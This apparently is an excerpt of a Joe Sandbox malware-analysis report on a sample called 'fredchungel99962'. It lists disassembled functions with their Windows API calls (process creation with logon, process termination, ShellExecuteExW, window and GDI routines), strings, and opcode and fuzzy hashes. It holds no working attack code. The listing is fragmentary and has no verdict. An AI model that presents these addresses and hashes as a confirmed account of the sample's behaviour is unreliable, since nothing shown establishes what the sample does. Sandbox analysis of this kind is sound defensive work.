CloseHandle.KERNEL32(00000004), ref: 01311520
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0131154F
DestroyEnvironmentBlock.USERENV(00000000), ref: 01311563

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 3ba41ff1792e666e8e47b9bc1fa3516514459209ccbc900c7b6b4646ee768d08
Instruction ID: 44e032d451c7618e080057a006aded5958d194087cd385617853d77590687ce5
Opcode Fuzzy Hash: 3ba41ff1792e666e8e47b9bc1fa3516514459209ccbc900c7b6b4646ee768d08
Instruction Fuzzy Hash: 03111476602209ABEB218FA8DD49BDA7BADEB08748F044025FA05A2064C775DA60DB61

Uniqueness

Uniqueness Score: -1.00%

Function 012D3382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,012D3379,012D2FE5), ref: 012D3390
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 012D339E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 012D33B7
SetLastError.KERNEL32(00000000,?,012D3379,012D2FE5), ref: 012D3409

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 05f906e60baf13c5cc717d898467d9281f96eb18194ff0cc1179f2662b39042a
Instruction ID: 896c7bca75eebb8173db675a4bdbfc6e507d6523c21a7352d4ab1c781c35f0e7
Opcode Fuzzy Hash: 05f906e60baf13c5cc717d898467d9281f96eb18194ff0cc1179f2662b39042a
Instruction Fuzzy Hash: 8801FCB36393136FE7766778FD845762A98FB16775B301229E610812E4EF61880187C5

Uniqueness

Uniqueness Score: -1.00%

Function 012E2D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,012E5686,012F3CD6,?,00000000,?,012E5B6A,?,?,?,?,?,012DE6D1,?,01378A48), ref: 012E2D78
_free.LIBCMT ref: 012E2DAB
_free.LIBCMT ref: 012E2DD3
SetLastError.KERNEL32(00000000,?,?,?,?,012DE6D1,?,01378A48,00000010,012B4F4A,?,?,00000000,012F3CD6), ref: 012E2DE0
SetLastError.KERNEL32(00000000,?,?,?,?,012DE6D1,?,01378A48,00000010,012B4F4A,?,?,00000000,012F3CD6), ref: 012E2DEC
_abort.LIBCMT ref: 012E2DF2

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: afafbccf77e650c689084065fed92f5dfa566eb8813451cc7ab3baf3125485ba
Instruction ID: 6c271a39f583666c1fba8ce7bf76afec9e31dac9c062d879b560c3209979dbfa
Opcode Fuzzy Hash: afafbccf77e650c689084065fed92f5dfa566eb8813451cc7ab3baf3125485ba
Instruction Fuzzy Hash: 5FF02836925603E7C7327638BC0DE6E26DDAFC26A1FA51018FB27D3188EE2998014220

Uniqueness

Uniqueness Score: -1.00%

Function 01348A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 012C9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 012C9693
Part of subcall function 012C9639: SelectObject.GDI32(?,00000000), ref: 012C96A2
Part of subcall function 012C9639: BeginPath.GDI32(?), ref: 012C96B9
Part of subcall function 012C9639: SelectObject.GDI32(?,00000000), ref: 012C96E2

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 01348A4E
LineTo.GDI32(?,00000003,00000000), ref: 01348A62
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 01348A70
LineTo.GDI32(?,00000000,00000003), ref: 01348A80
EndPath.GDI32(?), ref: 01348A90
StrokePath.GDI32(?), ref: 01348AA0

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 09e78aaa5212fd1669b0ae538e6b3624bf4423fe6ec87563728898d7859a341a
Instruction ID: 695caec80553597382e9dcd8020b00c65dfcfd389172c7c9eefba1610b060a17
Opcode Fuzzy Hash: 09e78aaa5212fd1669b0ae538e6b3624bf4423fe6ec87563728898d7859a341a
Instruction Fuzzy Hash: 3C111B7600114DBFEF229F94DC88EEA7FACEB09354F048051FA199A1A4C771AD55DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 013151FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 01315218
GetDeviceCaps.GDI32(00000000,00000058), ref: 01315229
GetDeviceCaps.GDI32(00000000,0000005A), ref: 01315230
ReleaseDC.USER32(00000000,00000000), ref: 01315238
MulDiv.KERNEL32 ref: 0131524F
MulDiv.KERNEL32 ref: 01315261

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: d933ac6007730d918f2c251c9909b5ba81a8f5b3ca2b5fe7c39508f46731596e
Instruction ID: bc9fe05f7cc702c27b4d26d5f2d9b0b01e8bbf2898d62e7fb70322a35a13a98a
Opcode Fuzzy Hash: d933ac6007730d918f2c251c9909b5ba81a8f5b3ca2b5fe7c39508f46731596e
Instruction Fuzzy Hash: F1014F75A01719BBEB209BA99C49A5EBFBCEB49751F044065FA04A7284DA70A801CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 012B1BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 012B1BF4
MapVirtualKeyW.USER32(00000010,00000000), ref: 012B1BFC
MapVirtualKeyW.USER32(000000A0,00000000), ref: 012B1C07
MapVirtualKeyW.USER32(000000A1,00000000), ref: 012B1C12
MapVirtualKeyW.USER32(00000011,00000000), ref: 012B1C1A
MapVirtualKeyW.USER32(00000012,00000000), ref: 012B1C22

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: e67bdad27134677ca448150674f95eafd893112e86cf9ce71f6f5d9e76466356
Instruction ID: 0659189978db5b7eb0199981d976c4557dde3d5791f8e06ffee7c647f0a51eb0
Opcode Fuzzy Hash: e67bdad27134677ca448150674f95eafd893112e86cf9ce71f6f5d9e76466356
Instruction Fuzzy Hash: 610144B0902B5ABDE3008F6A8C85A52FEA8FF19354F04411BA15C4BA42C7B5A864CFE5

Uniqueness

Uniqueness Score: -1.00%

Function 0131EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32 ref: 0131EB30
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0131EB46
GetWindowThreadProcessId.USER32(?,?), ref: 0131EB55
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0131EB64
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0131EB6E
CloseHandle.KERNEL32(00000000), ref: 0131EB75

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 6531b361b13612a6d9d3dbe2dfb97f58291e6bf564b51d28947d1aed9d70804b
Instruction ID: c909164410c7055e318ed00a2af8fa30ae082ff8406f37a5512a0c873b7157b0
Opcode Fuzzy Hash: 6531b361b13612a6d9d3dbe2dfb97f58291e6bf564b51d28947d1aed9d70804b
Instruction Fuzzy Hash: ECF03076642158BBE73157529C0EEEF7A7CEFCAB11F005158F601D1184DBA47A01C7B5

Uniqueness

Uniqueness Score: -1.00%

Function 01307439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32 ref: 01307452
SendMessageW.USER32(?,00001328,00000000,?), ref: 01307469
GetWindowDC.USER32(?), ref: 01307475
GetPixel.GDI32(00000000,?,?), ref: 01307484
ReleaseDC.USER32(?,00000000), ref: 01307496
GetSysColor.USER32 ref: 013074B0

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: 29a625e130afc9c8316e85638b27f01df57c0e874d1f1ea218625c7276d9d701
Instruction ID: 3935708c18c1c57d66ea055ddc45f7ce37ac89106c1f112f5f8b25729d6cf2ac
Opcode Fuzzy Hash: 29a625e130afc9c8316e85638b27f01df57c0e874d1f1ea218625c7276d9d701
Instruction Fuzzy Hash: 59018635401205EFEB225FA4DC09BEEBBB9FB04321F1551A4FA16A20A1CF312E41EB50

Uniqueness

Uniqueness Score: -1.00%

Function 01311874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0131187F
UnloadUserProfile.USERENV(?,?), ref: 0131188B
CloseHandle.KERNEL32(?), ref: 01311894
CloseHandle.KERNEL32(?), ref: 0131189C
GetProcessHeap.KERNEL32(00000000,?), ref: 013118A5
HeapFree.KERNEL32(00000000), ref: 013118AC

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 8659506ad185f9b5fd66f58282dbffcc1c7713cf70b1603d90f082cf3804fd93
Instruction ID: 52421a2523dea74efa1cb6622f26106533a970eb1e93d6082af9da23346ee043
Opcode Fuzzy Hash: 8659506ad185f9b5fd66f58282dbffcc1c7713cf70b1603d90f082cf3804fd93
Instruction Fuzzy Hash: 4BE0E53A206101BFDB215FA1ED0C90ABF3DFF49B22F105220F22581078CF32A420DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0133AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 0133AEA3

Part of subcall function 012B7620: _wcslen.LIBCMT ref: 012B7625

GetProcessId.KERNEL32(00000000), ref: 0133AF38
CloseHandle.KERNEL32(00000000), ref: 0133AF67

Strings

@, xrefs: 0133AE72
<, xrefs: 0133AE6B

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: 1eef54f2afa85f8aa6449c16ddb59e1016fd8a2921f17c2d307ee1543c89fd43
Instruction ID: 365e19b6ef1993587481381a5b362d90889c8a3ca467b9576c6d106fa5564d9d
Opcode Fuzzy Hash: 1eef54f2afa85f8aa6449c16ddb59e1016fd8a2921f17c2d307ee1543c89fd43
Instruction Fuzzy Hash: B6718E74A10215DFCB14DF58C484AAEBBF4FF48314F048499E85AAB3A1CB74ED45CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 01346278 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(00725208,?), ref: 013462E2
ScreenToClient.USER32(?,?), ref: 01346315
MoveWindow.USER32(?,?,?,?,000000FF,00000001), ref: 01346382

Strings

8lr, xrefs: 013462B1, 013463AC

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID: 8lr
API String ID: 3880355969-2725927297
Opcode ID: ca39a44c0e750fc5978d6adfc83a1a058f81fdd92938aba16d52930948a2ef4c
Instruction ID: 985fddefb8c733d95c18339048e58d9555cf82f8f26705acf51920b9631cd4f6
Opcode Fuzzy Hash: ca39a44c0e750fc5978d6adfc83a1a058f81fdd92938aba16d52930948a2ef4c
Instruction Fuzzy Hash: D3515CB4A00249AFCF21CF68D8819AE7BF5FF46368F108159F8159B2A1D730F981CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0131719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?), ref: 01317206
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0131723C
GetProcAddress.KERNEL32(?,DllGetClassObject,?,?,?,?,?,?,?,?,?), ref: 0131724D
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 013172CF

Strings

DllGetClassObject, xrefs: 01317242

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 230d3ecbc23d2d608c09b22bb658a090f12a25b53542a0214cd5498e3cb6ab2d
Instruction ID: 8deba054f3baf262bbf196544bb13ac128938e6278bb6f4a3b37eb770afb84e7
Opcode Fuzzy Hash: 230d3ecbc23d2d608c09b22bb658a090f12a25b53542a0214cd5498e3cb6ab2d
Instruction Fuzzy Hash: C8413E75600204AFDB29CF58C884ADA7FA9EF48318F1880A9FD059F20DD7B1D946CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0131C27D Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32 ref: 0131C306
DeleteMenu.USER32 ref: 0131C34C
DeleteMenu.USER32 ref: 0131C395

Strings

0, xrefs: 0131C2DF
`lr, xrefs: 0131C28D

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0$`lr
API String ID: 135850232-2009565289
Opcode ID: b68a714f9b7d8b9f83d872ee90a03beed4cd4a8c77c503e45a7382aa4917cbf7
Instruction ID: f3bc7813296277bbf2690f559292d346567852be62d9486d20a337aca10948b8
Opcode Fuzzy Hash: b68a714f9b7d8b9f83d872ee90a03beed4cd4a8c77c503e45a7382aa4917cbf7
Instruction Fuzzy Hash: C541F531244302DFD728DF29D884B6ABBE8FF85318F005A1EE9A5972C5C734EA05CB52

Uniqueness

Uniqueness Score: -1.00%

Function 01347674 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0134769A
GetWindowRect.USER32(?,?), ref: 01347710
PtInRect.USER32(?,?,01348B89), ref: 01347720
MessageBeep.USER32 ref: 0134778C

Strings

8lr, xrefs: 013476D6, 01347733

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID: 8lr
API String ID: 1352109105-2725927297
Opcode ID: 944fdb0ed1e4831181eaded290fdc137167e17d7a40fb6828797cdc323772350
Instruction ID: 4fce3c968ba7d2434dbba153e5fcd77f51f88633982fc200c2629f6677476cc3
Opcode Fuzzy Hash: 944fdb0ed1e4831181eaded290fdc137167e17d7a40fb6828797cdc323772350
Instruction Fuzzy Hash: 5E415A38A01215DFDB22CF58C484EA9BFF9FF49358F5981A8E9149B255C731B942CF90

Uniqueness

Uniqueness Score: -1.00%

Function 01311DE2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

Part of subcall function 012B9CB3: _wcslen.LIBCMT ref: 012B9CBD

Part of subcall function 01313CA7: GetClassNameW.USER32(?,?,000000FF), ref: 01313CCA

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 01311E66
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 01311E79
SendMessageW.USER32(?,00000189,?,00000000), ref: 01311EA9

Part of subcall function 012B6B57: _wcslen.LIBCMT ref: 012B6B6A

Strings

ListBox, xrefs: 01311E25
ComboBox, xrefs: 01311DF0

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: MessageSend$_wcslen$ClassName
String ID: ComboBox$ListBox
API String ID: 2081771294-1403004172
Opcode ID: 7bf7803d98a21c04f9efd0fc4795b1757eb77608f87f14ab279c18251b0c258d
Instruction ID: 6b0244283813cfda516980d29087e504fa5085829ff4060344a1158a2c263502
Opcode Fuzzy Hash: 7bf7803d98a21c04f9efd0fc4795b1757eb77608f87f14ab279c18251b0c258d
Instruction Fuzzy Hash: 41210771A00109BBDF18ABB5DC84CFFBBBDDF553A8B144119EA19A71D4DB3859058B30

Uniqueness

Uniqueness Score: -1.00%

Function 01344653 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 01344705
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 01344713
DestroyWindow.USER32 ref: 0134471A

Strings

msctls_updown32, xrefs: 01344684
8lr, xrefs: 013446D0, 013446EF

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: 8lr$msctls_updown32
API String ID: 4014797782-805957881
Opcode ID: 74bf22399d7f223ede9cebb643d5a28b3ca7736108917c5085948aec5a51317b
Instruction ID: c0c825400da956eb49c5e6830b5baab0109a498ca1627d0644cba3184de40065
Opcode Fuzzy Hash: 74bf22399d7f223ede9cebb643d5a28b3ca7736108917c5085948aec5a51317b
Instruction Fuzzy Hash: 15212FB5600209AFDB11DF68DCC0DBA7BEDEB5A3A8B040459FA1497351DA75FC12CB60

Uniqueness

Uniqueness Score: -1.00%

Function 01342F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 01342F8D
LoadLibraryW.KERNEL32(?), ref: 01342F94
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 01342FA9
DestroyWindow.USER32 ref: 01342FB1

Strings

SysAnimate32, xrefs: 01342F68

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
